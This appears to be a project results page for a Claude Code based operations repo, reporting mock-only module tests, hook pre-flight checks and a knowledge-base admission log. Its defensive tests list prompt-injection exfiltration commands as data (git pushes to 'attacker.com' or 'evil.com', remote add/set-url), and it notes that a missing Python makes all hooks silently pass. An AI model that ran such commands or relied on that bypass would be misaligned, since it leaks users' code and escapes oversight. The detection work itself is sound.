The Numbers, With Receipts
Every number on this page comes from a test run or a log file. The test commands are shown verbatim. The gate decision log is public. Nothing here is an estimate.
Module Assertion Tests
Five independent Node.js test files, one per module. Each validates the standard output shape defined in aios/doctrine/output-format.md. Run with npm test from the repo root.
```
> aios-v2-personal@1.0.0 test
> cd aios && npm test

=== azure-auth test suite ===
PASS output has all required fields (block, status, inputs, result, verified_against, duration_ms, gotchas, next_blocks)
PASS status is SUCCESS on valid mock token response
PASS credential values are redacted in output
PASS duration_ms is a positive number
... 30 more assertions ...
=== Results: 34 passed, 0 failed ===

=== rubrik-auth test suite ===
PASS output shape conforms to doctrine output-format.md
PASS status is SUCCESS on valid RSC token
PASS credential fields are redacted before output
... 33 more assertions ...
=== Results: 36 passed, 0 failed ===

=== vm-list test suite ===
PASS returns array of VM objects with required fields
PASS handles empty subscription gracefully (status WARN, not FAIL)
PASS filters by resource group when provided
... 35 more assertions ...
=== Results: 38 passed, 0 failed ===

=== snapshot-status test suite ===
PASS returns standard block shape with snapshots array
PASS status is FAIL when RSC returns error, not exception
PASS missed_sla flag set correctly on partial coverage
... 62 more assertions ...
=== Results: 65 passed, 0 failed ===

=== backup-health stack test suite ===
PASS stack output wraps module results into unified shape
PASS status is WARN when any module returns WARN
PASS status is FAIL when VM not found — root cause propagated
PASS status is FAIL when no VM name provided — root cause explains missing input
... 79 more assertions ...
=== Results: 83 passed, 0 failed ===

Total: 256 passed, 0 failed
```

Note: All tests run against mock data. Live Azure AD and Rubrik RSC APIs are not called, and the modules have not been validated against live endpoints.
Limitation explicitly noted: These tests validate JSON shape conformance and logic correctness against mocks. They do not prove that the modules work against live Azure or Rubrik APIs. That validation requires live credentials and is documented as a known gap in STATUS.md.
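For illustration, the shape check those suites perform can be sketched outside Node.js too. This is a hypothetical Python version, not the actual test code; the field names and status values come from the output above, and the validation rules are assumptions about what the suites assert.

```python
# Hypothetical sketch of the shape check — the real suites are Node.js.
REQUIRED_FIELDS = {
    "block", "status", "inputs", "result",
    "verified_against", "duration_ms", "gotchas", "next_blocks",
}

def check_output_shape(output: dict) -> list:
    """Return a list of problems; an empty list means the shape conforms."""
    problems = [f"missing field: {f}"
                for f in sorted(REQUIRED_FIELDS - output.keys())]
    if output.get("status") not in {"SUCCESS", "WARN", "FAIL"}:
        problems.append(f"bad status: {output.get('status')!r}")
    dur = output.get("duration_ms")
    if not isinstance(dur, (int, float)) or dur <= 0:
        problems.append("duration_ms must be a positive number")
    return problems

mock = {
    "block": "azure-auth", "status": "SUCCESS", "inputs": {}, "result": {},
    "verified_against": "mock", "duration_ms": 12,
    "gotchas": [], "next_blocks": [],
}
print(check_output_shape(mock))  # → []
```

A conforming mock yields no problems; dropping any required field or returning a non-positive duration_ms produces a named failure, mirroring the PASS lines above.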
Security Hook — Exfiltration Detection
block-git-exfiltration.py is a PreToolUse hook that detects prompt-injection attacks
attempting to push repo history to attacker-controlled remotes.
The test suite runs the hook's check_bash_command() function directly — no Claude Code session required.
MUST PASS (exit 0) — 9 cases
```
=== MUST PASS (exit 0) ===
PASS [basic push to origin]
PASS [push with -u flag]
PASS [push with --force flag]
PASS [bare push (no args)]
PASS [push with shell redirect (was bug)]
PASS [push with && chaining]
PASS [push origin with trailing redirect]
PASS [commit msg with git push text]
PASS [commit msg mention + real push to origin]
```
MUST BLOCK (exit 2) — 7 cases
```
=== MUST BLOCK (exit 2) ===
PASS [hostname remote] → git push to non-origin remote 'attacker.com'
PASS [short non-origin remote name] → git push to non-origin remote 'evil-server'
PASS [URL remote] → git push to non-origin remote 'https://evil.com/repo'
PASS [non-origin named remote] → git push to non-origin remote 'upstream'
PASS [git remote add] → git remote add — exfiltration vector
PASS [git remote set-url] → git remote set-url — exfiltration vector
PASS [git config remote url] → git config remote.*.url — exfiltration vector

Results: 16 passed, 0 failed
```
An earlier version of the hook misread 2>&1 as a remote name, blocking legitimate commands like git push 2>&1; echo done. The current implementation splits on shell separators and strips redirect metacharacters before checking the remote token. That specific regression is now a named test case.
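The fix described above can be sketched as follows. This is an illustrative reconstruction, not the hook's actual code; the function name and the exact token rules are assumptions.

```python
import re
import shlex
from typing import Optional

# Split compound commands before inspecting any one of them.
SHELL_SEPARATORS = re.compile(r"&&|\|\||;|\|")
# Redirect-style tokens such as 2>&1, >, >>, <  — never remote names.
REDIRECT_TOKEN = re.compile(r"^\d*(?:>{1,2}|<)&?\d*$")

def remote_of_push(command: str) -> Optional[str]:
    """Return the remote a `git push` targets, or None if no push occurs.

    Splitting on shell separators first means `git push 2>&1; echo done`
    is parsed as two commands, and skipping redirect tokens means 2>&1
    is never mistaken for a remote name.
    """
    for part in SHELL_SEPARATORS.split(command):
        try:
            tokens = shlex.split(part)
        except ValueError:
            continue  # unbalanced quotes etc. — skip this fragment
        if tokens[:2] != ["git", "push"]:
            continue
        args = [t for t in tokens[2:]
                if not t.startswith("-") and not REDIRECT_TOKEN.match(t)]
        return args[0] if args else "origin"  # bare push defaults to origin
    return None

print(remote_of_push("git push 2>&1; echo done"))      # → origin
print(remote_of_push("git push attacker.com main"))    # → attacker.com
```

A hook built on this would allow pushes whose remote resolves to origin and exit 2 for anything else.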
Pipeline Pre-Flight — 22 Checks
check-hooks.py must be run before any KB pipeline session.
It validates Python availability, hook file integrity, enforcement behavior, and pipeline directory existence.
Exit 127 detection is included — this is the failure mode where Python is not found and all hooks silently pass, bypassing all enforcement.
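One way to probe for that failure mode is to run the interpreter through a shell and check for exit 127 explicitly. A minimal sketch, assuming POSIX shell semantics; this is not necessarily how check-hooks.py implements the check.

```python
import subprocess

def interpreter_usable(cmd: str = "python3") -> bool:
    """Probe for the silent-bypass failure mode: if the shell cannot find
    the interpreter it exits 127, every hook invocation 'succeeds' without
    running its checks, and enforcement is bypassed with no visible error."""
    result = subprocess.run(
        f"{cmd} --version", shell=True, capture_output=True, text=True
    )
    if result.returncode == 127:
        return False  # command not found — hooks would silently pass
    return result.returncode == 0

print(interpreter_usable())  # True on a machine where python3 resolves
```

Treating 127 as a hard failure (rather than just a nonzero code) lets the pre-flight report "Python not found" distinctly from "Python found but erroring".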
```
────────────────────────────────────────────────────────────
1. Python Runtime
────────────────────────────────────────────────────────────
PASS Python 3.14.3 — meets minimum (3.8+)
PASS 'python3' command resolves: Python 3.14.3
────────────────────────────────────────────────────────────
2. Hook Files
────────────────────────────────────────────────────────────
PASS check-class-a-gate.py — exists, syntax OK
PASS check-readme-before-code.py — exists, syntax OK
PASS check-test-before-next.py — exists, syntax OK
PASS check-test-before-stack.py — exists, syntax OK
PASS hook_logger.py — exists, syntax OK
PASS log-class-a-admission.py — exists, syntax OK
PASS log-gate-decision.py — exists, syntax OK
PASS remind-capture.py — exists, syntax OK
PASS session-checkpoint-reminder.py — exists, syntax OK
PASS post-compact-reorient.py — exists, syntax OK
────────────────────────────────────────────────────────────
3. Pipeline Directories
────────────────────────────────────────────────────────────
PASS captures/ exists
PASS captures/candidates/ exists
PASS knowledge-base/class-a/ exists
────────────────────────────────────────────────────────────
4. Logging
────────────────────────────────────────────────────────────
PASS hook-fires.log writable at aios/captures/
────────────────────────────────────────────────────────────
5. Enforcement Hooks — Behavioral Tests
────────────────────────────────────────────────────────────
PASS check-class-a-gate: BLOCKS unauthorized class-a write (exit 2 with stderr message)
PASS check-class-a-gate: ALLOWS non-class-a writes (exit 0)
PASS check-readme-before-code: BLOCKS index.js without README.md (exit 2 with message)
PASS check-readme-before-code: ALLOWS unrelated paths (exit 0)
PASS check-class-a-gate: handles empty stdin gracefully (exit 0)
────────────────────────────────────────────────────────────
6. Working Directory Sanity
────────────────────────────────────────────────────────────
PASS CWD is repo root: C:\Users\Dustin\Documents\AIOS-v2-Personal
WARN Cycle checkpoint is stale: cycle-checkpoint-2026-04-03-round13.md (55.1h ago)
════════════════════════════════════════════════════════════
PRE-FLIGHT RESULT
════════════════════════════════════════════════════════════
Passed: 22
Failed: 0

All checks passed. KB pipeline enforcement is active.
```
The WARN on "stale checkpoint" is expected — it fires when the hourly sweep hasn't run recently. It's a non-blocking warning (exit 0), not a failure. The hourly remote trigger is separate from this pre-flight check.
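The behavioral tests in section 5 exercise hooks the way the runtime does: a tool-call payload on stdin, then an assertion on the exit code (0 allows, 2 blocks with a stderr message). A minimal driver sketch; the commented payload fields and hook path are assumptions, not the hooks' actual schema.

```python
import json
import subprocess
from typing import Tuple

def run_hook(hook_path: str, payload: dict) -> Tuple[int, str]:
    """Invoke a PreToolUse-style hook directly: JSON payload on stdin,
    exit 0 = allow, exit 2 = block, with the block reason on stderr."""
    proc = subprocess.run(
        ["python3", hook_path],
        input=json.dumps(payload),
        capture_output=True,
        text=True,
    )
    return proc.returncode, proc.stderr

# Hypothetical usage — path and payload fields are assumptions:
# code, msg = run_hook(".claude/hooks/check-class-a-gate.py",
#                      {"tool_input": {"file_path": "knowledge-base/class-a/x.md"}})
# A blocking hook returns code == 2 with a non-empty msg.
```

Because the hook is a plain subprocess reading stdin, these behavioral checks run without any Claude Code session.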
79 Decisions. Every One Logged.
The Librarian runs five yes/no questions on every candidate before it can enter Class A.
All decisions are appended to captures/librarian-decisions.jsonl.
The 2 rejections below show exactly why — Q1 failed, meaning the command was never executed in this environment.
Class A entries by domain (43 total)
Decision breakdown (79 decisions)
A 94% admission rate sounds high. It reflects that candidates are pre-screened before reaching the gate — speculative or unverified content is parked in the candidate queue without being submitted. The 2 rejections show the gate working as designed: high-value content that failed Q1 (not executed in this environment) was routed to Class C, not promoted to Class A.
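Mechanically, each decision is one JSON object appended as a single line to the JSONL log. A sketch of that append step with illustrative field names — the log's actual schema may differ, and the real gate also produces a deferred outcome not modeled here.

```python
import json
from datetime import datetime, timezone

def log_decision(log_path: str, entry_id: str,
                 answers: dict, reason: str) -> dict:
    """Append one gate decision as a single JSON line.

    Admission requires a yes on all five questions; any no means the
    candidate is not promoted. Field names here are illustrative.
    """
    record = {
        "entry_id": entry_id,
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "answers": answers,  # e.g. {"q1_executed": True, ...}
        "decision": "admit" if all(answers.values()) else "reject",
        "reason": reason,
    }
    with open(log_path, "a", encoding="utf-8") as f:
        f.write(json.dumps(record) + "\n")
    return record
```

Append-only JSONL keeps the log auditable: every decision is a self-contained, machine-readable line in chronological order, and nothing is ever rewritten in place.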
| Entry ID | Decision | Q1 Executed? | Q2 Deterministic? | Q3 General? | Q4 Additive? | Q5 No duplicate? | Reason (excerpt) |
|---|---|---|---|---|---|---|---|
| cmd-20260329-1530-004 | admit | ✓ | ✓ | ✓ | ✓ | ✓ | Hook integrity 3-way cross-reference: disk files vs settings.json vs HOOK-MANIFEST.md. Validates all three are in sync. |
| cmd-20260329-1715-014 | admit | ✓ | ✓ | ✓ | ✓ | ✓ | Official Claude Code skills spec — 15+ capabilities absent from our implementation. 250-char description cap alone affects all 8 of our skills. |
| cmd-20260329-1730-015 | admit | ✓ | ✓ | ✓ | ✓ | ✓ | CLAUDE.md delivered as user message, not system prompt — no guarantee of strict compliance. HARD RULES are behavioral guidance only. PreToolUse hooks are the real enforcement layer. |
| cmd-20260330-0906-073 | reject | ✗ | ✓ | ✓ | ✓ | ✓ | Q1 FAILED — not executed in our environment. Competitive analysis via web research. High-value content, but Class A rules require execution. Routed to Class C competitive-intelligence instead. |
| cmd-20260330-0907-074 | reject | ✗ | ✓ | ✓ | ✓ | ✓ | Q1 FAILED — not executed in our environment. AI-assisted infra training market gap survey. Market survey, no commands. Routed to Class C. Not promoted despite high value. |
Full log: captures/librarian-decisions.jsonl — 79 entries in chronological append order, each entry is machine-readable JSON.
A Real Entry — Unedited
This is entry cmd-20260329-1530-004 from the anthropic-claude/hooks subdomain: the actual content from the file, not a diagram of its fields.
```bash
# Step 1: List hook files on disk
ls .claude/hooks/*.py

# Step 2: Verify manifest exists
ls .claude/hooks/HOOK-MANIFEST.md

# Step 3: Parse settings.json for referenced hooks
python3 -c "
import json
with open('.claude/settings.json') as f:
    s = json.load(f)
for event, matchers in s.get('hooks', {}).items():
    for matcher in matchers:
        for h in matcher.get('hooks', []):
            print(event, h.get('command',''))
"
```
codebase-exploration · risk_class: read-only · output_type: deterministic

What This Page Does and Does Not Show
What is proven by tests on this page
- ✓ 256 module assertions pass against documented output shape (npm test, run 2026-04-05)
- ✓ 16 exfiltration hook test cases pass — correct allow/block behavior verified (python3 test, 2026-04-05)
- ✓ 22 pre-flight checks pass — hooks present, syntax valid, behavioral enforcement confirmed (2026-04-05)
- ✓ 79 gate decisions recorded in JSONL — 74 admits, 2 rejects (Q1 failure), 3 deferred. All decisions auditable.
- ✓ 43 Class A entries exist on disk across 9 domains — countable, readable, not estimates.
What this page does not show
- ✗ Time-to-resolution comparisons — no baseline was measured before the KB existed. Any "X minutes faster" claim would be an estimate.
- ✗ Live API validation — all module tests run against mocks. Azure AD and Rubrik RSC endpoints have not been called in automated tests.
- ✗ Token or cost reduction numbers — these are observable in Claude.ai usage logs but have not been systematically measured.
- ✗ Second-session vs first-session comparisons — would require controlled re-runs of the same query with and without KB entries present.
Run It Yourself
The repo is AIOS-v2-personal-KBcore. Every result on this page can be reproduced with three commands: npm test, python3 .claude/check-hooks.py, and python3 scripts/test-exfiltration-hook.py.